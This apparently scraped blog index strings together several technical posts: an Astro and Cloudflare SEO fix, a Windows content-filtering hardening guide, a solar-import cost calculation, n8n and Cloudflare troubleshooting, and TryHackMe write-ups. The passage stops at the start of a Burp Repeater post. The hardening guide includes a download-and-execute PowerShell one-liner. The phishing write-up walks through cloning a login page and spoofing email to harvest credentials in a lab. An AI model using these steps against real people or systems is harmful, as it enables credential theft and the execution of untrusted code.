Farros

Astro SEO: Fixing Trailing Slash Issues on Cloudflare

Mon, 20 Apr 2026 00:00:00 GMT

The Shock: A Near-Zero Performance Drop

It started with a routine check of Google Search Console (GSC). What I saw was developer’s nightmare: a performance graph that looked like a cliff. After a steady climb to over 1,000 clicks, the traffic suddenly cratered to near zero.

At first, I was confused. I hadn't changed any content, and there were no security manual actions or server errors. However, when I looked at the Indexing report, the truth came out. My indexed pages had plummeted from over 200 down to just 57.

The Context: Migrating from GitHub Pages to Cloudflare

The timing of this drop aligned with my migration from GitHub Pages to Cloudflare Pages. I made the move because I needed more advanced features, better edge performance, and higher bandwidth for my research lab, farros.co.

On GitHub Pages, my setup worked well with trailingSlash: false in my Astro config. But Cloudflare Pages handles URLs differently.

The Investigation: Hunting the "Blocked" URLs

I turned to Ahrefs to get a deeper look at the site's health. The dashboard confirmed: a Health Score of 57 and nearly 500 "Blocked" or redirect-heavy URLs.

When I dug into the "What's New" section of the audit, two errors were screaming for attention:

Canonical points to redirect (229 instances)
3XX redirect in sitemap (229 instances)

This was the "smoking gun." So many of my blog posts and category tags was stuck in a redirect loop.

The Root Cause: The "Trailing Slash Bounce"

By looking at the Ahrefs crawl details, I found the "bounce" pattern. It was a conflict between the application logic (Astro) and the hosting provider (Cloudflare).

How the conflict happened

Astro Config: I had trailingSlash: 'never' in my astro.config.ts.
Canonical Tag: Astro generated canonical links like https://farros.co/blog/my-post (no slash).
Cloudflare Hosting: Cloudflare Pages uses "Pretty URLs" by default. When it sees a directory-based build (which Astro uses for SSG), it enforces a trailing slash.
The Loop:
- Googlebot visits https://farros.co/blog/my-post/ (with slash).
- The HTML says: "The official (canonical) version is https://farros.co/blog/my-post (no slash)."
- Googlebot tries to go to the no-slash version.
- Cloudflare catches the request and says: "Nope, we use slashes here!" and sends a 308 Permanent Redirect back to the slash version.

Google sees this as a site that doesn't know where its own pages are, so it stops indexing them to avoid "Redirect Loops."

The Fix: Synchronizing Astro with Cloudflare

The solution was to stop fighting the server and align Astro with Cloudflare's behavior. I modified the astro.config.ts to force trailing slashes:

// astro.config.ts
export default defineConfig({
  site: 'https://farros.co',
  trailingSlash: 'always', // Changed from 'never'
  // ...
})

I also updated the RSS feed configuration to ensure the rss.xml generated URLs that matched the new standard:

// src/pages/rss.xml.ts
return rss({
  trailingSlash: true,
  // ...
})

The Role of Astro Pure in the Architecture

My site is built using the Astro Pure integration, which provides a robust set of SEO and performance tools out of the box.

Why this migration was tricky

Astro Pure is designed to be a "plug-and-play" solution for technical bloggers. It handles:

Automatic Schema.org Generation: It builds a complex JSON-LD @graph for search engines.
Dynamic Metadata: It manages OpenGraph and Twitter cards automatically.

However, because Astro Pure dynamically generates canonical URLs based on your astro.config.ts, the trailingSlash: 'never' setting was being "baked into" every single piece of metadata on the site. Astro Pure was well doing its job—it was just being told the wrong information by the framework configuration.

The Insight: When using an advanced theme like Astro Pure, your framework settings are more critical. The theme's automation will amplify your configuration choices (good or bad) across every page of your site.

The Result: A Near-Perfect 98 Health Score

After applying the trailing slash fixes across the configuration and internal links, I triggered a next crawl. The results were immediate as well. My Ahrefs Health Score jumped from a "Weak" 57 to an "Excellent" 98. Alhamdulillah

What changed?

Canonical Errors: Reduced to zero.
Orphan Pages: Resolved by updating internal links.
Redirects: Internal links now point directly to 200 OK pages, eliminating the 308 "bounce."

Lessons Learned

Moving from one host to another isn't just about moving files; it's about understanding how the new environment handles path normalization.

GitHub Pages is flexible and doesn't usually force redirects, making trailingSlash: 'never' safe.
Cloudflare Pages is stricter with its "Pretty URLs" feature, making trailingSlash: 'always' the best practice for SEO consistency.

References

This case study proves that even small architectural conflicts between your framework and your host can have massive consequences for your search presence. Try to verify your trailing slash behavior when migrating platforms!

Un-bypassable Windows Hardening for Content Filtering

Fri, 17 Apr 2026 00:00:00 GMT

Technology is a double-edged sword; while it has the power to empower and connect us, it can also be a tool for destruction. I am sharing this hardening method to combat the proliferation of content that is dangerous to our society—specifically explicit and harmful adult content—in an effort to protect and build a better generation.

When hardening a system against such content, a single layer is never enough. This guide uses a Red Teaming "Defense in Depth" approach to ensure filtering remains active even if the user tries to bypass it.

Why OpenDNS FamilyShield?

Before settling on this setup, I researched several major DNS providers focused on family safety:

Cloudflare Family (1.1.1.3): Fast and reliable, but sometimes lacks the granular strictness needed for deep content filtering.
CleanBrowsing: Highly effective, but some advanced features are locked behind a subscription.
NextDNS: Excellent customization and analytics. However, their free tier is limited to 300,000 queries per month, which is often insufficient for a busy home or office environment, leading to filtered traffic being allowed once the limit is hit.

I chose OpenDNS FamilyShield because it is completely free, requires zero configuration to start blocking adult content (no custom IDs or links needed), and is incredibly strict by default. It provides a robust "set and forget" foundation for our hardening layers.

Layer 1: The Network Perimeter (Router)

The first line of defense is your gateway. By setting DNS at the router level, every device on the network is protected by default.

How to do it: Log into your router's admin panel (usually 192.168.1.1). Find the DHCP or Internet settings and set the DNS servers to OpenDNS FamilyShield:

IPv4: 208.67.222.123 and 208.67.220.123
IPv6: 2620:119:35::123 and 2620:119:53::123

Layer 2: The OS Adapter Layer

Even if the router is bypassed, the Windows network adapter acts as a secondary filter.

Run this in PowerShell as Admin to force system-wide DNS. You have two options:

Option A: Active Adapters Only (Standard)

Use this if you only want to affect the connection you are currently using.

$dnsIpv4 = @("208.67.222.123", "208.67.220.123")
$dnsIpv6 = @("2620:119:35::123", "2620:119:53::123")

$adapters = Get-NetAdapter | Where-Object { $_.Status -eq "Up" }
foreach ($adapter in $adapters) {
    Set-DnsClientServerAddress -InterfaceAlias $adapter.Name -ServerAddresses $dnsIpv4
    Set-DnsClientServerAddress -InterfaceAlias $adapter.Name -ServerAddresses $dnsIpv6 -ErrorAction SilentlyContinue
}
Clear-DnsClientCache

Option B: Full Hardening (All Adapters)

Recommended for laptops. This ensures that even if you switch from Wi-Fi to Ethernet later, the protection remains active.

$dnsIpv4 = @("208.67.222.123", "208.67.220.123")
$dnsIpv6 = @("2620:119:35::123", "2620:119:53::123")

Get-NetAdapter | Set-DnsClientServerAddress -ServerAddresses $dnsIpv4
Get-NetAdapter | Set-DnsClientServerAddress -ServerAddresses $dnsIpv6 -ErrorAction SilentlyContinue
Clear-DnsClientCache

Layer 3: The Browser Layer (Policy Hardening)

Modern browsers often use DNS over HTTPS (DoH), which can bypass both Router and Adapter settings. We use Windows Registry Policies to lock the browser into a secure DoH provider and prevent the user from disabling it.

Firefox

Stop-Process -Name firefox -Force -ErrorAction SilentlyContinue
$path = "HKLM:\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS"
if (!(Test-Path $path)) { New-Item -Path $path -Force | Out-Null }

Set-ItemProperty -Path $path -Name "Enabled" -Value 1 -Type DWord
Set-ItemProperty -Path $path -Name "Locked" -Value 1 -Type DWord
Set-ItemProperty -Path $path -Name "ProviderURL" -Value "https://doh.familyshield.opendns.com/dns-query" -Type String
Write-Host "Firefox DNS is now locked to OpenDNS." -ForegroundColor Green

Chrome, Edge, Brave, & Opera (Chromium-based)

Most modern browsers are Chromium-based and share similar policy structures, but they use different Registry paths. Run these to lock DoH for your preferred browser:

# Define the DNS settings
$dohMode = "secure"
$dohTemplate = "https://doh.familyshield.opendns.com/dns-query"

# Registry Paths for different browsers
$paths = @(
    "HKLM:\SOFTWARE\Policies\Google\Chrome",        # Chrome
    "HKLM:\SOFTWARE\Policies\Microsoft\Edge",      # Edge
    "HKLM:\SOFTWARE\Policies\BraveSoftware\Brave", # Brave
    "HKLM:\SOFTWARE\Policies\Vivaldi",             # Vivaldi
    "HKLM:\SOFTWARE\Policies\Opera"                # Opera
)

foreach ($path in $paths) {
    if (!(Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    Set-ItemProperty -Path $path -Name "DnsOverHttpsMode" -Value $dohMode -Type String
    Set-ItemProperty -Path $path -Name "DnsOverHttpsTemplates" -Value $dohTemplate -Type String
}

Write-Host "Chromium-based browsers are now locked to OpenDNS." -ForegroundColor Green

Layer 4: Content & Search Enforcement (Hosts)

We can force "SafeSearch" at the IP level by modifying the hosts file. This prevents users from seeing explicit results even on "clean" search engines. We also block "Proxy Search Engines" like Startpage, which can be used to bypass DNS filters via their "Anonymous View" feature.

# Google & YouTube SafeSearch
216.239.38.120 www.google.com
216.239.38.120 google.com
216.239.38.120 www.youtube.com
216.239.38.120 m.youtube.com

# Bing SafeSearch
204.79.197.220 www.bing.com

# DuckDuckGo SafeSearch
52.149.246.39 safe.duckduckgo.com

# Brave SafeSearch
# (Note: Brave uses its own indexing, but blocking specific domains can help)
0.0.0.0 search.brave.com # Optional: Block if you want to force Google/Bing SafeSearch

# Startpage (Proxy Bypass)
# Startpage's "Anonymous View" acts as a web proxy, bypassing DNS filters.
0.0.0.0 startpage.com
0.0.0.0 www.startpage.com
0.0.0.0 s7.startpage.com

Layer 5: Privilege Management (The Lock)

The most critical layer. All the settings above can be reversed if the user has Administrative privileges. By switching to a Standard User account, the user cannot modify the Registry, the Hosts file, or Network Adapter settings.

Security Note: For this "Lock" to be effective, your primary Administrative account must have a strong password that the Standard User does not know. This prevents the user from using "Run as Administrator" to bypass your policies.

This final step also prevents the installation of VPNs, Proxies, or Portable Browsers that could tunnel traffic past our DNS filters. Since a Standard User cannot install new network drivers, they are effectively locked into the hardened environment.

Layer 6: The Firewall Layer (IP Blocking)

DNS filtering only blocks domain names. If a site uses a direct IP address (like many movie piracy sites), you must block the "number" itself using the Windows Firewall. Many movie piracy sites are notorious for serving adult advertisements or even hosting explicit adult content directly, making IP-level blocking essential for a clean environment.

# Block specific malicious IPs directly
New-NetFirewallRule -DisplayName "Block Malicious IPs" `
    -Direction Outbound `
    -Action Block `
    -RemoteAddress "162.244.93.0/24", "195.63.129.0/24", "139.59.72.0/24", "167.71.201.0/24", "139.59.34.0/24", "165.232.170.0/24", "146.190.87.0/24", "129.212.208.0/24","159.203.161.0/24","165.245.144.0/24","143.110.182.0/24","154.93.72.0/24","159.223.73.0/24"

Since the user is a Standard User (Layer 5), they cannot modify or delete these firewall rules.

Layer 7: Real-time Content Scanning (Keyword Blocking)

Even with DNS and IP blocks, some sites might slip through or be dynamic. We can implement real-time content scanning at the browser level to block the entire page if specific keywords or phrases are found.

Option A: uBlock Origin (Static Blocking)

Using a browser extension like uBlock Origin, you can implement real-time content scanning. The keywords below are common title markers for popular piracy websites that often serve "semi-adult" content.

Add these to your "My filters" tab in uBlock Origin:

! Hide the entire page if the title contains these piracy brands
*##html:has(title:has-text(LK21))
*##html:has(title:has-text(Dunia21))
*##html:has(title:has-text(Layarkaca21))
*##html:has(title:has-text(Rebahin))
*##html:has(title:has-text(IDLIX))
*##html:has(title:has-text(BOS21))

! Hide the entire page if the body text contains these specific phrases
*##body:has-text(Nonton Film Semi)
*##body:has-text(Download Film Semi)

Option B: Tampermonkey (Advanced Redirects)

For a more "educational" approach, you can use Tampermonkey to redirect the user to a specific video (e.g., a security awareness video) when a violation is detected. This method allows for complex logic, such as excluding trusted domains like Google or your own workspace.

Create a new script in Tampermonkey and paste the following:

// ==UserScript==
// @name         Redirect Piracy Sites by Content
// @namespace    http://tampermonkey.net/
// @version      1.1
// @description  Redirects the page to YouTube if specific piracy brands or text are found.
// @match        *://*/*
// @exclude      *://*.farros.co/*
// @exclude      *://farros.co/*
// @exclude      *://*.medium.com/*
// @exclude      *://medium.com/*
// @exclude      *://*.google.com/*
// @exclude      *://google.com/*
// @exclude      *://*.youtube.com/*
// @exclude      *://youtube.com/*
// @grant        none
// @run-at       document-idle
// ==/UserScript==

(function() {
    'use strict';

    // The YouTube URL you want to redirect to
    const targetURL = "https://www.youtube.com/watch?v=fbTlW1V2VuI&t=2726s";

    // Regex for titles
    const badTitles = [
        /lk21/i, /dunia21/i, /layarkaca21/i, /rebahin/i, /idlix/i, /bos21/i, /indoxx1/i
    ];

    // Regex for body text
    const badText = [
        /nonton film semi/i, /download film semi/i
    ];

    let shouldRedirect = false;

    // Check document title
    if (document.title && badTitles.some(regex => regex.test(document.title))) {
        shouldRedirect = true;
    }

    // Check body text
    if (!shouldRedirect && document.body) {
        const pageText = document.body.innerText || document.body.textContent;
        if (badText.some(regex => regex.test(pageText))) {
            shouldRedirect = true;
        }
    }

    // Redirect to YouTube if a match is found
    if (shouldRedirect) {
        // Clear the page instantly to hide the content while the redirect happens
        document.documentElement.innerHTML = '<h1 style="text-align:center; margin-top:20%; font-family:sans-serif;">Redirecting to Educational Content...</h1>';
        window.location.replace(targetURL);
    }
})();

This ensures that even if a new domain appears, if it uses the same branding or content markers, it will be instantly hidden and redirected.

Layer 8: Extension Persistence (The Force Install)

Layer 7 is only effective if the uBlock Origin extension remains active. A savvy user might try to disable or uninstall the extension to bypass your keyword filters. We can use Windows Registry policies to "force-install" the extension, making it impossible for a Standard User to remove or disable it from the browser settings.

Run this in PowerShell as Admin to lock uBlock Origin into Firefox:

# Create the Extension Settings policy path
$firefoxPolicyPath = "HKLM:\SOFTWARE\Policies\Mozilla\Firefox\ExtensionSettings"
if (!(Test-Path $firefoxPolicyPath)) { New-Item -Path $firefoxPolicyPath -Force | Out-Null }

# Force-install uBlock Origin and prevent removal
$uBlockConfig = '{"installation_mode":"force_installed","install_url":"https://addons.mozilla.org/firefox/downloads/latest/ublock-origin/latest.xpi"}'
Set-ItemProperty -Path $firefoxPolicyPath -Name "uBlock0@raymondhill.net" -Value $uBlockConfig

Once applied, the "Remove" and "Disable" buttons for uBlock Origin in Firefox will be hidden or greyed out, and the extension will be automatically re-installed if the browser profile is refreshed.

Minimal Implementation (One-Click)

For those who want to apply these hardening layers quickly, I have created a consolidated PowerShell script that automates Layers 2, 3, 4, and 6 in one go. You can find the full source code and documentation in my GitHub repository: farrosfr/noa.

To run the hardening script instantly, open PowerShell as Administrator and paste the following command:

irm https://raw.githubusercontent.com/farrosfr/noa/main/harden.ps1 | iex

Note: Always review scripts from the internet before running them. This script will modify your DNS settings, Registry policies, and Firewall rules to enforce strict content filtering.

How to Verify Your Setup

Once you've applied all layers, perform these tests to ensure your "Defense in Depth" is active:

OpenDNS Welcome Page: Visit welcome.opendns.com. You should see a message saying: "Welcome to OpenDNS! Your internet is safer, faster, and smarter."
The "Blocked" Test: Try to visit a known adult site. You should be greeted by the OpenDNS "This site is blocked" page.
The Browser Lock: Open your browser's DNS settings. You should see a message stating: "Your browser is managed by your organization" and the option to change DNS settings should be disabled (greyed out).

Red Team Insight: The Defense in Depth Structure

As a Red Teamer, I approach security by looking for the "weakest link." A single filter is just a hurdle; a multi-layered defense is a wall. This guide follows a Defense in Depth (DiD) structure designed to fail-safe:

Perimeter (Router): The first line of defense. It catches every device on the network before they even reach the OS.
System (Adapter): If a device leaves the network or uses a VPN that doesn't leak DNS, the OS-level adapter settings act as a secondary guard.
Application (Browser Policy): Many modern threats (and bypasses) happen at the application layer. By using Registry Policies, we force the browser to obey the rules, even if the user tries to toggle settings in the UI.
Content (Hosts): We target the specific content delivery method (Search Engines) to ensure that even "clean" sites don't serve explicit results.
Privilege (Standard User): The ultimate lock. In security, Identity and Access Management (IAM) is king. Without Admin rights, the user cannot tear down the other four layers.
Active Content Inspection (Keyword Blocking): The final safeguard. By scanning the DOM in real-time, we can block pages that bypass domain and IP filters but still contain known harmful keywords or branding.

By layering these controls, you create a system where the "cost of bypass" is higher than the user's technical ability or patience.

Calculating Global Import Costs for Industrial Products

Tue, 14 Apr 2026 00:00:00 GMT

When importing industrial products from the global market, the price you see on a B2B website is only the beginning. To determine the true "landed cost," you must account for logistics, duties, and local taxes.

This guide comes from my real experience managing a B2B e-commerce platform for electrical and renewable energy products. One of the biggest challenges in this business process is the "Pricing Gap." In the industrial sector, prices are rarely static or real-time. Producers often don't update their own websites, leaving platform managers in a constant struggle to find competitive, accurate base prices for products like PV modules.

In this guide, I will demonstrate how to calculate the pricing flow using PV Modules (Solar Panels) imported from China to Indonesia as a case study.

1. Understanding Product Pricing (EXW)

Most industrial suppliers quote prices based on EXW (Ex Works), meaning the price only covers the goods at the factory door. Shipping and handling are your responsibility.

The "Price Trap": Web Listing vs. Actual Quote

In the B2B world, the price you see on Alibaba or Google Shopping is often a "teaser" price. As a platform manager, I've found that even producers often do not update their websites in real-time. This reveals a critical industry truth: B2B pricing is often a private market. Many competitive rates are never published openly; they are hidden behind direct negotiations and volume commitments.

For a 50MWp project, the gap between what is listed and what is finally quoted in a private chat can be massive:

| Type | Unit Price | Total EXW Cost (50MWp) | Gap | | :--- | :--- | :--- | :--- | | Web Listing | $0.08 / Wp | $4,000,000 | - | | Market Reality | $0.12 / Wp | $6,000,000 | +$2,000,000 |

Example Project Details (Theoretical Example):

Project Size: 50 MWp (50,000,000 Wp)
Module Capacity: 650 Wp per panel
Theoretical Unit Price: $0.08 / Wp

Cost of Goods Calculation:

Total Panels: 50,000,000 Wp ÷ 650 Wp = 76,924 panels
Total EXW Cost: 50,000,000 Wp × $0.08 = $4,000,000.00

2. Logistics & Container Calculation

Industrial orders are shipped in containers. For PV modules, we typically use 40'HC (High Cube) containers.

Load per Container: 31 panels per pallet × 20 pallets = 620 panels
Total Containers Required: 76,924 panels ÷ 620 = 125 x 40'HC containers

Origin Handling (The "EXW" Burden)

Since our pricing is EXW, we must account for:

Inland China Transport: Moving 125 containers from the factory to the port (e.g., Ningbo/Shanghai).
Origin Port Charges: Terminal Handling Charges (THC) and export documentation.

To estimate sea freight costs, you can use platforms like Freightos. Register an account and input your details:

You can choose your preferred currency (USD, EUR, or GBP) and then fill in these four key fields:

Origin
Destination
Load
Goods

Estimated Shipping Cost: ~$448,683.58 (based on current market rates).

Disclaimer: Logistics and tax calculations in this guide are based on the $4,000,000 theoretical EXW value. In a real scenario using the $0.12/Wp market price, costs like insurance and financial fees will increase proportionally.

3. Adding Duties and Taxes (The "Hidden" Costs)

This is where many calculations fail. For Indonesia, you must consider the HS Code (8541.43.00) for PV modules and the mandatory Form E for duty exemption.

| Component | Rate | Calculation Base | Estimated Cost | | :--- | :--- | :--- | :--- | | Marine Insurance | 0.2% | EXW Value | $8,000 | | Import Duty | 0% | CIF (Goods + Ins + Freight) | $0 (ACFTA w/ Form E) | | VAT (PPN) | 11% | CIF + Duty | ~$490,235 | | Income Tax (PPh 22) | 2.5% | CIF + Duty | ~$111,417 |

Note: PPh 22 is 2.5% for owners of an API (Import Identification Number) and 7.5% without one. To achieve 0% duty, your supplier must provide a Form E (Certificate of Origin).

4. Final Landed Cost

To get your final price per unit, sum all costs including the "last mile" handling in Indonesia:

EXW Cost: $4,000,000
Sea Freight & Insurance: $456,683
Taxes (VAT + PPh 22): $601,652
Local Handling (PPJK + 125 Trucks): ~$72,500
Total Landed Cost: $5,130,835

Final Unit Price: $5,130,835 ÷ 50,000,000 Wp = $0.1026 / Wp

5. The Regulatory Finish Line (Indonesia)

Price is only half the battle. In Indonesia, two factors can stop your project entirely:

SNI Certification: PV modules must have the SNI (Standar Nasional Indonesia) mark. Without it, Customs will not release the goods. This applies to both private and government projects.
TKDN (Local Content): This is the "make or break" factor for Government-linked projects (Instansi/BUMN). These projects require a high percentage of local content. Even if importing is cheaper, you may be legally required to source from local factories to meet the regulatory threshold.
The Private Sector (Swasta) Advantage: For purely private projects, there is typically no strict minimum TKDN requirement. This allows private developers more flexibility to import Tier 1 modules directly from global manufacturers to achieve the best price-to-performance ratio.

By following this flow, you can accurately predict whether your project is financially viable before signing any contracts. Always remember that the "Cheap" price online is just the first step in a very long journey!

Phishing Basics | TryHackMe Write-up

Sun, 12 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Phishing Basics. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This section introduces phishing as a powerful tool in a penetration tester's arsenal. Unlike technical vulnerabilities, phishing targets the human element, exploiting psychology to bypass robust technical defenses. A successful phishing attack can lead to initial network access, malware deployment, or credential theft.

Are you ready?

No answer needed

Task 2: Phishing 101

Phishing is a social engineering attack used to trick individuals into revealing sensitive data or executing malware by impersonating legitimate entities. There are three main types discussed: generic Phishing (a broad attack sent to many), Spear Phishing (a highly targeted attack on a specific individual), and Whaling (spear phishing targeting high-level executives like CEOs). Ethical hackers use these techniques to evaluate and strengthen an organization's security posture.

What is the primary channel used during a smishing attack?

sms

You are a CEO and have just received a phishing email sent only to you. What type of phishing is this?

Whaling

Task 3: Psychology of Phishing

Phishing relies heavily on psychological manipulation. It utilizes several core social engineering principles to bypass logical thinking: Scarcity (FOMO), Urgency (time pressure), Authority (compliance with perceived leaders), Fear (anxiety over security alerts), Curiosity (desire to know secrets), and Trust (familiarity with brands or colleagues). The material also highlights cognitive biases that make people susceptible, such as overconfidence bias, confirmation bias, and authority bias.

You receive an email stating that a special offer for the new iPhone will expire in 24 hours if you don't act now. Which principle is being used?

Urgency

An executive requests sensitive data via email, emphasising their position within the company. Which principle is being used?

Authority

You receive a message promising exclusive access to a new product no one else knows about if you click on a link. Which principle is being used?

Curiosity

You receive an email claiming that your account credentials were found in a recent data breach. Which principle is being used?

Fear

Task 4: Phishing Techniques

This task details the technical methods used to deceive victims. It covers URL manipulation (URL masking, homograph attacks, and typosquatting) to hide malicious links. It explains email spoofing, where attackers manipulate SMTP headers to fake the sender's identity, which organizations combat using SPF, DMARC, and DKIM. Additionally, it introduces credential harvesting via cloned login pages and payload delivery using malicious document macros. Popular phishing tools like GoPhish, EvilNginx, and The Social Engineering Toolkit (SET) are also highlighted.

Which technique relies on users making a typo?

Typosquatting

Which three security measures help organisations defend against email spoofing? Answer format: Alphabetical order, separated by commas

DKIM, DMARC, SPF

Task 5: Anatomy of a Phishing Campaign

A successful phishing campaign follows a structured lifecycle: Planning & Scoping (defining goals and rules of engagement), Reconnaissance (gathering OSINT), Scenario & Payload Development (crafting realistic lures and benign payloads), Exploitation & Post-Exploitation (executing the attack and monitoring metrics), and Reporting & Debriefing (analyzing data and providing actionable recommendations). The task includes a benchmarking table to map metrics (like Click Rate and Credential Entry Rate) to specific security recommendations.

Your campaign shows a credential entry rate of 6%. According to the benchmarks, what risk level does this represent?

High risk

Which metric measures the percentage of users who open an attachment?

Attachment Detonation Rate

A client has a click rate of 10%. Which single recommendation from the table would you give them?

Focused security awareness training

Task 6: The Social Engineering Toolkit

This hands-on scenario involves using the Social Engineering Toolkit (SET) to perform a spear-phishing attack against a target named Bob. The process includes starting a credential harvester listener by cloning a target webpage (typosquatting the domain). Then, using an email client (Rainloop) to spoof an internal support email address, bypassing standard email security measures. Once the target interacts with the cloned site, the terminal captures and displays the harvested credentials.

What is the password flag?

First, we need to connect to the attacker via SSH and start SET (Social Engineer Toolkit) then select this:

Social-Engineering Attacks
Website Attack Vectors
Credential Harvester Attack Method
Custom Import

Then, provide the following path for index.html /home/attacker/setoolkit/ and choose the first option, Copy just the index.html. And finally, enter the following URL: http://tryacounting.thm

Go to attacker mail inbox and fill it out like this: from: support@tryaccounting.thm to: bob@tryaccounting.thm

Fill in the subject line and the body of the email, then send the email.

Finally, we get the flag from the terminal response

Task 7: Conclusion

The room wraps up by summarizing the key concepts learned from a pentester's perspective, including the psychological principles of social engineering, technical manipulation techniques like typosquatting and spoofing, and the deployment of actual phishing tools. It provides a solid foundation for evaluating an organization's susceptibility to human-based attacks.

Well done on completing this room! If you're looking for a challenge, try out our You Got Mail room.

No answer needed

Thanks for reading. See you in the next lab.

Why Your WWW Domain Shows Error 522 And How to Fix It

Sun, 12 Apr 2026 00:00:00 GMT

You just finished building a blazing-fast static website. You deployed it to Cloudflare Pages, linked up your custom domain, and everything looks perfect. example.com loads instantly.

But then, out of habit, you type www.example.com into your browser. Instead of your beautiful new site, you are greeted by: Error 522: Connection timed out.

If you check your DNS settings, everything looks correct. You have your root domain pointing to your .pages.dev project, and a CNAME record pointing www to your root domain. So, what gives?

Here is why this happens and how you can fix it.

The Problem: Cloudflare Pages is a Strict Bouncer

When you set up a CNAME for www pointing to example.com, Cloudflare forwards the traffic to your Cloudflare Pages origin server.

However, Cloudflare Pages relies strictly on the hostname of the incoming request to figure out which project to serve. When a request comes in for www.example.com, Pages checks its internal guest list. Because you only registered example.com as a custom domain for your project, Pages doesn't recognize the www version.

Not knowing what to do with the unrecognized hostname, the server drops the connection, resulting in the dreaded Error 522.

What is Error 522?

Before we fix it, let's briefly understand what is actually happening.

An Error 522 (Connection timed out) happens when Cloudflare (acting as the middleman) tries to connect to your web server (where your website actually lives), but the server takes too long to respond or doesn't respond at all.

Think of it like calling a friend on the phone. Cloudflare dials the number, but the phone just rings and rings until the call eventually drops. Cloudflare is telling you, "I tried to reach your server, but it ghosted me." Usually, this means a server is down or overloaded. However, in the case of Cloudflare Pages, your server isn't broken at all. It is ignoring the request on purpose because of a strict nametag policy.

The Fix: Choose Your Path

To resolve this, you have two options depending on your preference.

Option 1: Redirect WWW to your Root Domain (Recommended)

From an SEO and modern web design perspective, it is best practice to choose one version of your domain and stick to it. Redirecting www to your root domain (also known as the apex or naked domain) ensures search engines don't penalize you for duplicate content.

Here is how to set up a seamless, lightning-fast redirect at the edge:

Leave your current DNS records as they are (ensure www is a CNAME pointing to your root domain and is "Proxied" via the orange cloud).
In your Cloudflare dashboard, navigate to Rules in the left sidebar, then select Redirect Rules.
Click Create rule.
Name your rule something descriptive, like "Redirect WWW to Root".
Under If..., select Custom filter expression and configure it as follows:
- Field: Hostname
- Operator: equals
- Value: www.example.com (replace with your actual domain)
Under Then..., configure the dynamic redirect:
- Type: Dynamic
- Expression: concat("https://example.com", http.request.uri.path) (replace example.com with your domain)
- Status code: 301 (Permanent Redirect)
Click Deploy.

Now, anyone who stubbornly types www will be instantly and invisibly redirected to your clean, root domain.

Option 2: Add WWW as a Custom Domain in Pages

If you actively want users to see the www in their address bar, you need to tell Cloudflare Pages to officially recognize it.

Go to your Cloudflare dashboard and click on Workers & Pages in the left sidebar.
Select your specific Pages project.
Navigate to the Custom Domains tab.
Click Set up a custom domain.
Enter www.example.com and follow the prompts to add it.

Cloudflare will automatically provision the SSL certificates and adjust the backend routing. Within a few minutes, the Error 522 will vanish, and your site will happily serve traffic on the www subdomain.

How to Install n8n via Docker and Fix the 503 Error

Fri, 10 Apr 2026 00:00:00 GMT

Self-hosting n8n is an incredible way to build powerful automations without worrying about execution limits. The most reliable way to install n8n on a VPS is using Docker. However, the setup doesn't always go perfectly on the first try.

In this guide, I will walk you through the standard Docker installation for n8n, how to spot a common failure point, and how to fix the "503 Service Unavailable" error if your container gets stuck in a crash loop.

Step 1: Preparing the Directory and Docker Compose File

First, we need to create a dedicated directory on our server to store n8n's persistent data. This ensures that if the server restarts or the container is rebuilt, you don't lose your workflows.

Connect to your server via SSH and run the following commands:

mkdir -p /opt/n8n/data
cd /opt/n8n

Next, create the configuration file:

nano docker-compose.yml

Paste the following configuration into the file. Make sure to adjust the N8N_HOST, WEBHOOK_URL, and GENERIC_TIMEZONE variables to match your specific setup.

version: '3.8'

volumes:
  n8n_data:

services:
  n8n:
    image: docker.n8n.io/n8nio/n8n
    restart: always
    ports:
      - "127.0.0.1:5678:5678"
    environment:
      - N8N_HOST=n8n.domain.com
      - N8N_PORT=5678
      - N8N_PROTOCOL=https
      - NODE_ENV=production
      - WEBHOOK_URL=https://n8n.domain.com/
      - GENERIC_TIMEZONE=GMT+7 # Change to your timezone
    volumes:
      - /opt/n8n/data:/home/node/.n8n

Save and exit the file.

Step 2: Starting the Container (And Hitting a Wall)

With the configuration ready, it is time to spin up the container in the background:

docker compose up -d

Normally, you would now set up your reverse proxy, attach an SSL certificate, and navigate to your domain. But sometimes, you are greeted with this instead:

If you see a Service Unavailable error, it usually means your web server (like Apache or Nginx) is working fine, but it cannot communicate with the internal n8n container on port 5678.

Let's find out why.

Step 3: Troubleshooting the Crash Loop

When a reverse proxy fails to connect, the first thing to check is if the Docker container is actually running.

Run the following command to check your active containers:

docker ps

If you look at the STATUS column and see Restarting, it means n8n is trying to boot up, crashing, and trying again.

To see exactly why it is crashing, we need to check the logs. Be careful here—if you just type docker logs n8n, you might get an error saying No such container: n8n. This is because Docker Compose automatically prefixes container names based on the directory.

Check the NAMES column from your docker ps output. In this case, the container is actually named n8n-n8n-1.

Let's pull the correct logs:

docker logs n8n-n8n-1

Step 4: The Fix (Folder Permissions)

Looking at the logs, the culprit reveals itself: Error: EACCES: permission denied, open '/home/node/.n8n/config'.

Because we manually created the /opt/n8n/data folder as the root user on the host machine, the n8n Docker container (which runs internally as user 1000) does not have the correct permissions to read or write files to it.

The fix is a simple, single command to change the ownership of that specific folder:

chown -R 1000:1000 /opt/n8n/data

Once the permissions are updated, navigate back to your n8n directory (if you aren't there already) and restart the container so it can try booting up again:

cd /opt/n8n
docker compose restart

Step 5: Verification

Finally, let's verify that the container is stable. Run:

docker ps

If the status now says Up and stays up for more than a few seconds, you have successfully fixed the issue!

Give n8n about 30 seconds to initialize its internal database, then refresh your web browser.

The 503 error should be completely gone, and you will be greeted by the n8n setup screen. Happy automating!

Burp Suite: Repeater | TryHackMe Write-up

Thu, 09 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Burp Suite: Repeater. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This room explores the advanced capabilities of the Burp Suite Repeater module, building upon the foundations of the Burp Basics room. You will learn how to manipulate and resend captured requests for manual testing. To follow along, you need to deploy the target VM and start your AttackBox or personal environment.

Let's get started!

No answer needed

Task 2: What is Repeater?

Burp Suite Repeater allows us to modify and resend intercepted requests to a target for manual exploration and endpoint testing. The interface consists of six main sections: Request List, Request Controls, Request and Response View, Layout Options, Inspector (which provides a user-friendly way to analyze/modify requests), and Target.

Which sections gives us a more intuitive control over our requests?

Inspector

Task 3: Basic Usage

